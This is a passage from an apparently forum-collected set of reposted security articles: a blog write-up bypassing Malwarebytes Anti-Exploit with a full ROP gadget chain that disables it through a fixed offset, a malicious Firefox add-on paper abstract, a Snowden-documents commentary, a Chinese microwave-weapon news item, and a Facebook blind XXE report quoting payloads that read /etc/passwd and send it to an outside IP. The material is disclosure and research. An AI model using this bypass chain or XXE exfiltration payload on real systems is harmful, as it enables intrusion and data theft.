legitimate reply. When the developers blindly copied this code they perhaps didn't knew that 1. if ROP gadget which jumps into hooked api has either -5th or -3rd byte 0xE8, the check is failing 2. all a person has to do is search for this pattern in binary [?E8][XX][?E8][XX][XX][C3] to bypass the check 3. exploit author can simply VirtualProtect and return into stack at a nop sled which can be preceded by 0xE8 since we very well control stack to defeat this check easily 4. This mistake is repeated with return address -7 being compared to 0x9A (opcode for FAR CALL) and return address - 5 being compared to 0x9A again. (opcode for FAR call but with 16bit address) Blunder: Leaving aside the mistakes it has, the code is meant to be written for 32bit binaries. But apparently developers never bothered to check 1. If return address - 3 == 0xE8 && return address - 4 == 0x66 (prefix for 16bit call in 32bit address space) these two checks should be performed side by side for accuracy, but right now the check is if return address - 3 ==0xE8 || return addresss - 5 ==0xE8. 2. DWORD*(return address - 4) + return address - 5 should be equal to VirtualProtect, Apparently developers of this tool checked if there is a call instruction before return address but didn't check if that call is leading to hooked API or not. () (>_<) 3. If you do call a 16bit address from a 32bit address space you can only call upto 0xFFFF, if detection was concerned, no legitimate or illegitimate code can ever call an API within 0xFFFF because dll's are mapped at higher addresses closer to 0x7fffffff, Thus this check is nearly useless for detection as its useful for potential candidates looking to find flaws in this method. 4. I am pretty sure the author of RopGuard meant to simply include 16bit and 32bit Rop check in 1 package but he meant to use them one at a time depending on application architecture. But who cares. So it seems blind cope paste is not only done by engineering students, but by 'professional' developers also. VirtualProtect Returns into stack preceded by handcrafted dummy 0xE8 bytes thus bypassing ROP detection from call precedence check. While i crafted this chain by just altering 2 bytes off an already existing rop chain, i thought it would bypass MBAE completely. But it failed yet again. So i dug deeper. VirtualProtectEx is also hooked inside hook It seems that unlike usual methods of hooking 1 API and leaving its nested ones by using a global variable or a TLS entry for IPC, MBAE infact hooks all nested API's of VirtualProtect and performs different checks on either levels. Thus there are more checks, and that is why i wasn't able to bypass MBAE when using previous ROP chain with 2 modified bytes. VirtualProtectEx checking if lpAddress param of VirtualProtect is inside stack Checks inside ZwProtectVirtualMemory 1. StackPivot Check 2.RopGuardCallPrecedenceCheck 3.Checking if stack is being made executable Up until now, for VirtualProtect API there are only 3 protections which detect ROP. There are more protections to check if api call is from shellcode, but i dont think detecting that is necessary because once you get opcode execution these petty checks can be circumvented by n number of measures. one example being: changing PEB entry of loaded module to [x] and copying any PE header to shellcode -0x1000 address ([x]) which can be done in nearly 25 bytes using handcrafted optimized shellcode. [h=3]One Byte Issue[/h] To defeat all these protections, i followed offsec's approach. There was a global switch, a fixed offset which decided the fate of MBAE's protections. in previous images you might see a reoccurring instruction. cmp dword ptr ds:[<Magic_Offset>],0 je <mbae.LegitimateCall> This magic offset is actually a dword but it has only 2 possible values. 0 or 1 if its 0 all protections are disabled and this check will jump over detection mechanisms. if its 1 all protections are enabled and all checks will be performed with full functionality. (another way to bypass MBAE's shellcode checks) As of now December 10th 2014, this offset is 0x47C08. protection check Highlighted Now since we have a stack overflow, we cannot craft any data dynamically. So we have to perform a makeshift ROP chain which will somehow find mbae.dll's base address and then add offset to its value. Then moving null into that address. Then we can use our ROP chain used before. After 20 minutes of mind boggling i came up with following rop chain 0x78833e3c, # POP EAX # RETN 0x78801108, # GetModuleHandle Address from IAT 0x78830e9a, # MOV EAX,[EAX] # RETN 0x788543e9, # XCHG EAX,EDX # RETN 0x7882ab5d, # PUSH ESP # POP ESI # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x788079f0, # POP EBP # RETN 0x0000008c, # offset from esp pointing towards mbae.dll 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to mbae.dll 0x7889363e, # POP ECX # RETN 0x7889363f, # RETN 0x788fad49, # POP EDI # RETN 0x7889363f, # RETN 0x7880126c, # POP ESI # RETN 0x7888e209, # ADD ESP,0xC 0x788172ee, # PUSHAD # RETN #EAX gets base address of mbae.dll 0x788079f0, # POP EBP # RETN magic_offset, 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to magic offset 0x7880A254, # POP EDX, RETN 0x00000000, # NULL 0x78907a82, # MOV [EAX],EDX # RETN 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN data appended: 9090eb09 6d6261652e646c6c00 (mbae.dll string) 909090909090909090909090909090909090 (nop sled) Since we had a stack overflow at our disposal, i had to embedd mbae.dll string in between nop sled, so ROP gadgets can take its address by reading esp. Had this been a Heap corruption vulnerability or a UAF, it would have been much more easy. Nevertheless i managed to bypass MBAE in nearly 40 gadgets, which means not much stack space is wasted. This offset can be utilized in browser exploits in a better way, exploits have the power to detect if they are running under malware bytes or emet's protection by reading system dll's. Up until now they just exit if they are running under such an environment, But it seems they dont need to. All an author has to do is simply change the gadgets as per exploit's requirement. This gadget chain can be reproduced very easily for any other kind of exploit, since the gadgets i used are not at all complicated and can be found in any dll with a very good probability. Afterwards this revelation, the exploit was fairly straightforward. After disabling MBAE, ROP gadgets trying to mark stack as RWX Et' Voila Posted by r41p41 at 12:06 Sursa: Scrutiny from an Inquisitive mind: MBAE (Malware Bytes Anti Exploit) Disarm

Abusing, Exploiting and Pwning with Firefox Add-ons Ajin Abraham AJINABRAHAM.COM www.keralacyberforce.in ajin25@gmail.com Abstract This paper discuss about a number of ways through which hackers can use Mozilla Firefox as a platform to run there malicious piece of code with all the privileges and features as that supported by any native programming languages. Also there is an advantage that these malicious codes remain stealthy and undetected against anti-virus solutions. Malicious Firefox add-ons can be coded to serve this purpose. Mozilla Firefox Browser Engine acts just like a compiler or interpreter to execute your codes without much security concerns. The coding technologies for add-on development can be abused and exploited to create malicious add-ons. This paper explains how Firefox’s insecure policies and add-on development technologies like JavaScript, CORS, Web Socket, XPCOM and XPConnect can be abused by a hacker for malicious purposes. The widely popular browser add-ons can be utilized by hackers to implement new malware attack vectors. This paper is supported by proof of concept add-ons which are developed by exploiting the weakness in Firefox add-on coding. The proof of concept includes the implementation of a local keylogger, a remote keylogger, spawning a reverse shell, stealing the Firefox user session data, stealing Linux password files and Distributed Denial of Service (DDoS) Attack. All of these attack vectors are fully undetectable against anti-virus solutions and can bypass filters or protection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/24541.pdf

[h=3]On the new Snowden documents[/h] If you don't follow NSA news obsessively, you might have missed yesterday’s massive Snowden document dump from Der Spiegel. The documents provide a great deal of insight into how the NSA breaks our cryptographic systems. I was very lightly involved in looking at some of this material, so I'm glad to see that it's been published (i.e., I can now stop looking over my shoulder). Unfortunately with so much material, it can be a bit hard to separate the signal from the noise. In this post I’m going to try to do that a little bit -- point out the bits that I think are interesting, the parts that are old news, and the things we should keep an eye on. Background Those who read this blog will know that I’ve been wondering for a long time how NSA works its way around our encryption. This isn't an academic question, since it affects just about everyone who uses technology today. What we've learned since 2013 is that NSA and its partners hoover up vast amounts of Internet traffic from fiber links around the world. Most of this data is plaintext and therefore easy to intercept. But at least some of it is encrypted -- typically protected by protocols such as SSL/TLS or IPSEC. Conventional wisdom pre-Snowden told us that the increasing use of encryption ought to have shut the agencies out of this data trove. Yet the documents we’ve seen so far indicate that the opposite has happened. Instead, the NSA and GCHQ has somehow been harvesting massive amounts of SSL/TLS and IPSEC traffic, and appear to be making inroads into other technologies such as Tor as well. How are they doing this? To repeat an old observation, there are basically three ways to crack an encrypted connection: Go after the mathematics. This is expensive and unlikely to work well against modern encryption algorithms (with a few exceptions). The leaked documents give very little evidence of such mathematical breaks — though a bit more on this below. Go after the implementation. The new documents confirm a previously-reported and aggressive effort to undermine commercial cryptographic implementations. The new documents provide context for how important this type of sabotage is to the NSA. Steal the keys. Of course, the easiest way to attack any cryptosystem is simply to steal the keys. Yesterday we received a bit more evidence that this is happening. I can’t possibly spend time on everything that’s covered by these documents — you should go read them yourself — so below I’m just going to focus on the highlights. Not so Good Will Hunting First, the disappointing part. The NSA may be the largest employer of cryptologic mathematicians in the United States, but — if the new story is any indication — those guys really aren’t pulling their weight. In fact, the only significant piece of cryptanalytic news in the entire stack comes is a 2008 undergraduate research project looking at AES. Sadly, this is about as unexciting as it sounds -- in fact it appears to be nothing more than a summer project by a visiting student. More interesting is the context it gives around the NSA’s efforts to break block ciphers such as AES, including the NSA's view of the difficulty of such cryptanalysis, and confirmation that NSA has some ‘in-house techniques’. Additionally, the documents include significant evidence that NSA has difficulty decrypting certain types of traffic, including Truecrypt, PGP/GPG, Tor and ZRTP from implementations such as RedPhone. Since these protocols share many of the same underlying cryptographic algorithms — RSA, Diffie-Hellman, ECDH and AES — some are presenting this as evidence that those primitives are cryptographically strong. As with the AES note above, this ‘good news’ should also be taken with a grain of salt. With a small number of exceptions, it seems increasingly obvious that the Snowden documents are geared towards NSA’s analysts and operations staff. In fact, many of the documents seem geared towards actually protecting knowledge of NSA's cryptanalytic capabilities from NSA's own operational staff (and other Five Eyes partners). As an analyst, it's quite possible you'll never learn why a given intercept was successfully decrypted. To put this a bit more succinctly: the lack of cryptanalytic red meat in these documents may not truly be representative of the NSA’s capabilities. It may simply be an artifact of Edward Snowden's clearances at the time he left the NSA. Tor One of the most surprising aspects of the Snowden documents — to those of us in the security research community anyway — is the NSA’s relative ineptitude when it comes to de-anonymizing users of the Tor anonymous communications network. The reason for our surprise is twofold. First, Tor was never really designed to stand up against a global passive adversary — that is, an attacker who taps a huge number of communications links. If there’s one thing we’ve learned from the Snowden leaks, the NSA (plus GCHQ) is the very definition of the term. In theory at least, Tor should be a relatively easy target for the agency. The real surprise, though, is that despite this huge signals intelligence advantage, the NSA has barely even tested their ability to de-anonymize users. In fact, this leak provides the first concrete evidence that NSA is experimenting with traffic confirmation attacks to find the source of Tor connections. Even more surprising, their techniques are relatively naive, even when compared to what’s going on in the ‘research’ community. This doesn’t mean you should view Tor as secure against the NSA. It seems very obvious that the agency has identified Tor as a high-profile target, and we know they have the resources to make much more headway against the network. The real surprise is that they haven’t tried harder. Maybe they're trying now. SSL/TLS and IPSEC A few months ago I wrote a long post speculating about how the NSA breaks SSL/TLS. Because it’s increasingly clear that the NSA does break these protocols, and at relatively large scale. The new documents don’t tell us much we didn’t already know, but they do confirm the basic outlines of the attack. The first portion requires endpoints around the world that are capable of performing the raw decryption of SSL/TLS sessions provided they know the session keys. The second is a separate infrastructure located on US soil that can recover those session keys when needed. All of the real magic happens within the key recovery infrastructure. These documents provide the first evidence that a major attack strategy for NSA/GCHQ involves key databases containing the private keys for major sites. For the RSA ciphersuites of TLS, a single private key is sufficient to recover vast amounts of session traffic — in real time or even after the fact. The interesting question is how the NSA gets those private keys. The easiest answer may be the least technical. A different Snowden leak shows gives some reason to believe that the NSA may have relationships with employees at specific named U.S. entities, and may even operate personnel “under cover”. This would certainly be one way to build a key database. But even without the James Bond aspect of this, there’s every reason to believe that NSA has other means to exfiltrate RSA keys from operators. During the period in question, we know of at least one vulnerability (Heartbleed) that could have been used to extract private keys from software TLS implementations. There are still other, unreported vulnerabilities that could be used today. Pretty much everything I said about SSL/TLS also applies to VPN protocols, with the additional detail that many VPNs use broken protocols and relatively poorly-secured pre-shared secrets. The NSA seems positively gleeful about this. Open Source packages: Redphone, Truecrypt, PGP and OTR The documents provide at least circumstantial evidence that some open source encryption technologies may thwart NSA surveillance. These include Truecrypt, ZRTP implementations such as RedPhone, PGP implementations, and Off the Record messaging. These packages have a few commonalities: They’re all open source, and relatively well studied by researchers. They’re not used at terribly wide scale (as compared to e.g., SSL or VPNs) They all work on an end-to-end basis and don’t involve service providers, software distributers, or other infrastructure that could be corrupted or attacked. What’s at least as interesting is which packages are not included on this list. Major corporate encryption protocols such as iMessage make no appearance in these documents, despite the fact that they ostensibly provide end-to-end encryption. This may be nothing. But given all we know about NSA’s access to providers, this is definitely worrying. A note on the ethics of the leak Before I finish, it's worth addressing one major issue with this reporting: are we, as citizens, entitled to this information? Would we be safer keeping it all under wraps? And is this all 'activist nonsense'? This story, more than some others, skates close to a line. I think it's worth talking about why this information is important. To sum up a complicated issue, we live in a world where targeted surveillance is probably necessary and inevitable. The evidence so far indicates that NSA is very good at this kind of work, despite some notable failuresin actually executing on the intelligence it produces. Unfortunately, the documents released so far also show that a great deal of NSA/GCHQ surveillance is not targeted at all. Vast amounts of data are scooped up indiscriminately, in the hope that some of it will someday prove useful. Worse, the NSA decided that this bulk surveillance justifies its efforts to undermine confidence in many of the security technologies that protect our own information systems. The President's own hand-picked review council has strongly recommended this practice be stopped, but their advice has -- to all appearances -- been largely disregarded. These are matters that are worthy of debate, but this debate that largely hasn't happened. Unfortunate if we can't enact changes to fix these problems, technology is probably about all that's left. Over the next few years encryption technologies are going to be widely deployed, not only by individuals but also by corporations desperately trying to reassure overseas customers who doubt the integrity of US technology. In that world, it's important to know what works and doesn't work. Insofar as this story tells us that, it makes us all better off. Posted by Matthew Green at 5:53 PM Sursa: A Few Thoughts on Cryptographic Engineering: On the new Snowden documents

@FarSe ?

China transform? cuptorul cu microunde în arm? non-letal? capabil? s? provoace dureri insuportabile Aurelian Mihai - 29 dec 2014 Instalat deasupra unui camion militar, dispozitivul botezat Poly WB-1 con?ine o versiune modificat? a magnetronului folosit pentru înc?lzirea rapid? a alimentelor în cuptorul cu microunde. Ajutat cu o anten? deflectoare, dispozitivul poate transmite un fascicul de unde radio cu intensitate redus? la distan?e de pân? la 1Km. Fasciculul cu lungime de und? de ordinul milimetrilor poate penetra doar straturile superioare ale pielii, suficient pentru a induce dureri insuportabile ?i senza?ie de arsur?. zoom inPoly WB-1 Prezentat? drept arm? neletal?, Poly WB-1 ar putea fi folosit? de autorit??i pentru dispersarea mul?imilor de protestatari ?i incapacitarea trupelor de solda?i pe câmpul de b?t?lie, stopând astfel conflictele armate f?r? a recurge la arme letale. Aparent, dispozitivul prea voluminos pentru a fi inclus în recuzita trupelor de ordine va fi instalat doar pe vehicule blindate ale armatei, complementând tradi?ionalele tunuri cu ap? sub presiune ?i arsenalul de gaze lacrimogene. Un dispozitiv similar numit Raytheon Active Denial System a mai fost testat ?i în Statele Unite în anul 2007 ca mijloc pentru controlul mul?imilor, îns? a fost abandonat în cele din urm? din cauza unor limit?ri de ordin tehnic. Aparent, prototipul creat necesita 18 ore pentru a porni ?i avea un consum uria? de combustibil la func?ionarea în regim de a?teptare. Probabil, publicitatea negativ? ?i tema autorit??ilor fa?? de reac?ia opiniei publice este de ajuns deocamdat? pentru a descuraja folosirea unei astfel de arme, existenta sa în arsenalul Chinei servind doar ca factor de intimidare. Sursa: China transform? cuptorul cu microunde în arm? non-letal? capabil? s? provoace dureri insuportabile

Facebook hacking using a forged Microsoft Word document By Delwyn Pinto on December 29, 2014 Facebook hacking using a forged Microsoft Word document Mohamed Ramadan, a white hat security researcher, has found a critical vulnerability in Facebook which lets user control using a forged Microsoft Word .docx file. Ramadan has successfully found vulnerabilities in major service providers like Google, Facebook, Twitter, Microsoft etc. and has been rewarded with bug bounty reward by them. Known Vulnerabilities It is a known fact that Facebook does not have the most secure servers in the world. Many people have reported high severity bugs since 2010 and the social network had also patched a dangerous XXE Vulnerability affecting OpenID in late 2013. An XXE (XML External Entity ) is a method that exploits a weak XML parsing mechanism. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts. You can read more about these fixes here. Facebook had clarified that it had fixed all of its servers so finding another XXE vulnerability seemed highly unlikely. Yet Ramadan decided to continue his quest. After some digging, he came onto Facebook’s career page https://www.facebook.com/careers/ . He successfully uploaded his CV onto Facebook but he realized he could only upload files in PDF or .DOCX formats. A .docx file format is basically a zipped xml files developed by Microsoft and Ramadan saw a loophole in Facebook’s security system. He created a fake CV with forged Microsoft Word document and uploaded onto the the Facebook careers web page. He created an XML file with the following code written in it DOCTYPE root [ <!ENTITY % file SYSTEM “file:///etc/passwd”> dtd SYSTEM “http://197.37.102.90/ext.dtd”> %dtd; %send; ]=]=> Now he had a forged CV ready. He started a HTTP server running on Python on his local machine. He made a file named ext.dtd waiting in mohaab007 directory and here is the content of ext.dtd: <!ENTITY % all “ x25; send SYSTEM ‘http://197.37.102.90/FACEBOOK-HACKED?%25file;’>” > %all; After uploading the forged Word CV he waited for response from Facebook website. As he states on his blog, “Now everything is good and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute or so chatting and browsing now it is time to stop python http server and close Facebook and everything . I was going to close my terminal window and I was shocked to see that something connected to my python http server” He had successfully managed to fool a Facebook server to connect to his server. In his own words, he could now exploit this connection to: DoS the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con TCP scans using HTTP external entities (including behind firewalls since application servers often have worldview different from that of the attacker) Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back) DoS on other systems (if parsing system is allowed to establish TCP connections to other systems) NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?) Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS. Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper. Aftermath He tried to gain access to system files on the server, but failed to get access , most probably due to security mechanisms in place. But he was confident that the attack he managed to pull off was a Blind XXE Out Of Band (OOB) plus it was a time-consuming process because he needed to upload and wait the result after 15 minutes or more. Without further ado , he informed the social network of his findings. His findings were rejected outright the first time, with the following words. He responded to the Facebook’s security team by sending them the forged CV to which FB got back with following reply : He still was not satisfied and continued corresponding with the Facebook Security team, which ultimately realised the vulnerability in its file upload mechanism. Bounty Received Facebook has acknowledged the vulnerability and according to its policy, rewarded Ramadan for his research. They fixed the vulnerability by adding this line of code: “ libxml_disable_entity_loader(true)“ Following is a PoC video Ramadan uploaded on YouTube to showcase the vulnerability in Facebook Resource : Attack Secure Sursa: Hacking Facebook using a forged Microsoft Word document